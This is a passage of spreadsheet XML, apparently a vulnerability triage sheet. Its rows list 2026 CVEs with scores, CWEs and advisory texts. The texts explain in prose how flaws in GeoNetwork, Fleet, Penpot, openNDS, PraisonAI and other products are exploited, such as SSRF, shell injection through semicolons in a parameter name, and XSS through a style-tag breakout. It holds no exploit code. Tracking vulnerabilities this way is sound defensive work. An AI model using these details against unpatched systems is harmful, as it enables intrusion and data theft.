      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55658</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr"/>
      <c r="Q437" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R437" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. In 3e595f3 and prior, when a streaming proposal is funded, the cluster of streaming contracts moves real pool funds into the proposal's StreamingEscrow to back the Superfluid constant flow agreement (the CFA deposit, plus a 0.5 percent margin). cancelProposal then zeroes the escrow's GDA member units but never reclaims that parked balance, and the permissionless claim() forwards the escrow's entire balance, including the pool funded buffer, to the beneficiary. The beneficiary is chosen by the proposal submitter and defaults to the submitter. The only path that returns escrow funds to the pool is drainToStrategy, which is onlyStrategy and is reached solely from the dispute reject ruling, never from cancel or natural completion. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="S437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55658</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55864</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr">
        <is>
          <t>maven:org.geonetwork-opensource:gn-web-app</t>
        </is>
      </c>
      <c r="M438" s="5" t="inlineStr">
        <is>
          <t>4.2.17, 4.4.12</t>
        </is>
      </c>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr"/>
      <c r="P438" s="5" t="inlineStr"/>
      <c r="Q438" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>### Summary
An unauthenticated server-side request forgery vulnerability lets any anonymous user make the GeoNetwork server issue arbitrary outbound HTTP requests. This gives an external attacker a position inside the server's network, making it possible to make internal requests no matter if the response is XML-type or not.
The SLD tooling endpoint `POST /api/tools/ogc/sld` takes a caller-supplied **WMS server URL** and performs a **server-side HTTP GET** to it, with no validation. The fetched body can also be stored and downloaded if the output of the outbound request is in XML format, making the SSRF non-blind.
### Impact
Any unauthenticated user can make the server send arbitrary HTTP requests to internal hosts it would never expose publicly, and read the responses back if the request responses are XML. This enables internal data disclosure, for example, configuration files that return as XML, authorization bypass, and reconnaissance of the internal network all from an anonymous position.
### Resolution 
Patched releases:
* 4.4.12
* 4.2.17
### Resources
* https://github.com/geonetwork/core-geonetwork/pull/9343</t>
        </is>
      </c>
      <c r="S438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55864</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57171</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr"/>
      <c r="Q439" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, the catalog-generate, profile-generate, and ssp-generate author commands write generated Markdown to an attacker-influenced output path without path-traversal validation, allowing arbitrary file write outside the Trestle workspace. These commands join the user-supplied output argument onto the Trestle root and write to the result, but guard it only with an is_directory_name_allowed() task-name-collision check rather than the PathSecurityValidator.validate_local_path() guard used by the jinja command, so an absolute path or one containing traversal sequences escapes the workspace and writes files under an attacker-chosen location as the invoking process owner. The security boundary is crossed when a trusted CI job, shared service, or wrapper derives the output argument from repository-controlled, tenant-controlled, or otherwise untrusted data while expecting output to stay inside the workspace. When --force-overwrite is used, the selected output directory is first recursively deleted, extending the primitive to destruction of an attacker-chosen directory tree and enabling indirect code execution by overwriting files a pipeline later runs. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="S439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57171</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61617</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr"/>
      <c r="Q440" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>Wings is the server control plane for the Pterodactyl game-server management panel. In versions up to and including 1.13.2, the SFTP write path does not enforce a server's disk quota during a transfer, allowing a tenant with SFTP write access to a single server to exhaust the host node's physical disk and take down every server on it. Wings checks available space only once, as a boolean, when the write handle is opened, using a stale cached usage value and without knowing the size of the incoming data, and it then returns a raw, unaccounted file handle that is never re-checked as the transfer proceeds. A single upload can therefore be written without bound, far beyond the configured disk limit, until the node's disk is full, and because a server stopped for exceeding its limit is not treated as suspended, SFTP writes are still accepted even after the quota is already exceeded. This issue is fixed in version 1.13.3.</t>
        </is>
      </c>
      <c r="S440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61617</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61792</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr"/>
      <c r="Q441" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59, CWE-693</t>
        </is>
      </c>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, a project administrator can read files outside their repository through the App store metadata download feature, which resolves attacker-influenced paths without adequately confining them to the repository. This is an incomplete fix for CVE-2026-34242, whose original patch failed to fully prevent the path traversal, allowing the arbitrary file read to persist. A user with project-administrator privileges can therefore disclose the contents of files on the Weblate host that lie outside the project's repository. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="S441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61792</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77646</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>0b655efc-079c-4cb9-9e8d-164871239f4e</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr"/>
      <c r="Q442" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-918</t>
        </is>
      </c>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability has been reported in PTC Windchill PDMLink and PTC FlexPLM. The vulnerability may be exploited through the deserialization of untrusted data.</t>
        </is>
      </c>
      <c r="S442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77646</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79637</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr"/>
      <c r="Q443" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R44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443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79637</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87084</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr">
        <is>
          <t>tanium:enforce</t>
        </is>
      </c>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr"/>
      <c r="Q444" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a server-side request forgery vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="S444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87084</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87996</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr"/>
      <c r="Q445" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.1, SafePlaywrightURLLoader in backend/open_webui/retrieval/web/utils.py validated a user-controlled hostname in Python and then let the Playwright browser resolve it again in the sync and async request interceptors. An authenticated user controlling authoritative DNS could return a public address to validation and an internal address to the browser, exposing responses from internal services or cloud metadata through web search or URL ingestion. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87996</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38822</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr"/>
      <c r="Q446" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>In openNDS before 11.0.0, the client_params.sh script, invoked by the openNDS daemon to serve the authenticated client status page, is vulnerable to OS command injection through crafted HTTP GET query parameter keys. An authenticated captive portal user can inject arbitrary shell commands by embedding semicolons in a URL query parameter name.</t>
        </is>
      </c>
      <c r="S446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38822</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47666</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr"/>
      <c r="Q447" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>Penpot is an open-source design and prototyping platform. In versions up to and including 2.14.3, Penpot is vulnerable to stored cross-site scripting through custom font family names, which are interpolated into a @font-face CSS rule and injected into the page as HTML without sanitization. Because the backend accepts an arbitrary font-family string and the frontend writes the resulting style through innerHTML, a name containing markup such as a closing style tag followed by a script can break out of the style element and execute JavaScript on the Penpot origin. The attack is passive: any team member who opens a file referencing the malicious font triggers script execution simply by rendering the page, allowing theft of session cookies, actions performed as the victim, and access to their files and projects. This issue is fixed in version 2.15.3.</t>
        </is>
      </c>
      <c r="S447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47666</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53635</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr"/>
      <c r="Q448" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>Open edX Platform enables the authoring and delivery of online learning at any scale. Prior to commit 59bb6d6, the view function set_course_mode_price() at lms/djangoapps/instructor/views/instructor_dashboard.py:430 is decorated only with @login_required and performs no course-level permission check. Any authenticated user — including a learner account with zero course roles — can issue a single POST request to overwrite the honor mode price and currency of any course on the platform. The companion frontend modal was removed in a prior cleanup, but the URL route and view remain live, making this an unguarded orphan endpoint. This issue has been patched via commit 59bb6d6.</t>
        </is>
      </c>
      <c r="S448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53635</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54245</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr"/>
      <c r="Q449" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions prior to 4.86.2, the Okta conditional access integration in Fleet Premium is vulnerable to SQL injection through a host-supplied value that is used in a database query without proper parameterization, allowing an attacker who controls a single enrolled host to read or modify arbitrary data in the Fleet database. The value is reported by the host's own agent and stored verbatim, then used on an unauthenticated request path that supports the conditional access integration, so any party controlling one enrolled host, the lowest-privilege position in the product, can influence the query. By disclosing arbitrary database contents an attacker can extract stored session tokens and replay them to act as a global administrator, and on a managed fleet that administrator access enables running scripts on enrolled hosts, leading to remote code execution. The issue requires Fleet Premium with the Okta conditional access integration enabled and does not affect instances where it is not configured. This issue is fixed in version 4.86.2.</t>
        </is>
      </c>
      <c r="S449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54245</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55532</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr"/>
      <c r="Q450" s="5" t="inlineStr">
        <is>
          <t>CWE-346, CWE-352</t>
        </is>
      </c>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, MCP HTTP Stream _validate_origin uses request_origin.startswith(allowed), allowing the attacker-controlled localhost.attacker.com HTTP origin to satisfy the localhost allowlist. A webpage can send Content-Type: text/plain requests without preflight and invoke tools/call without an API key, including file writes that persist agent instructions. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55532</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77368</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr"/>
      <c r="Q451" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In version 4.39, the filer's TUS resumable-upload handler checks JWT allowed_prefixes scoping only when a session is created, letting a low-privilege tenant hijack another tenant's upload session to write content to filer paths their own token forbids. The HEAD, PATCH, and DELETE verbs that act on an existing session by its id never verify that the session's stored target path falls within the caller's allowed prefixes, so a tenant who obtains another upload's session identifier can PATCH attacker bytes into it and, on completion, have the file land at the victim's out-of-scope path. The same token can also DELETE other tenants' sessions and HEAD them to read upload progress and size, defeating the JWT prefix isolation. This vulnerability only affects deployments that configure filer JWT signing and have TUS uploads enabled. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="S451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77368</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80182</t>
        </is>
      </c>
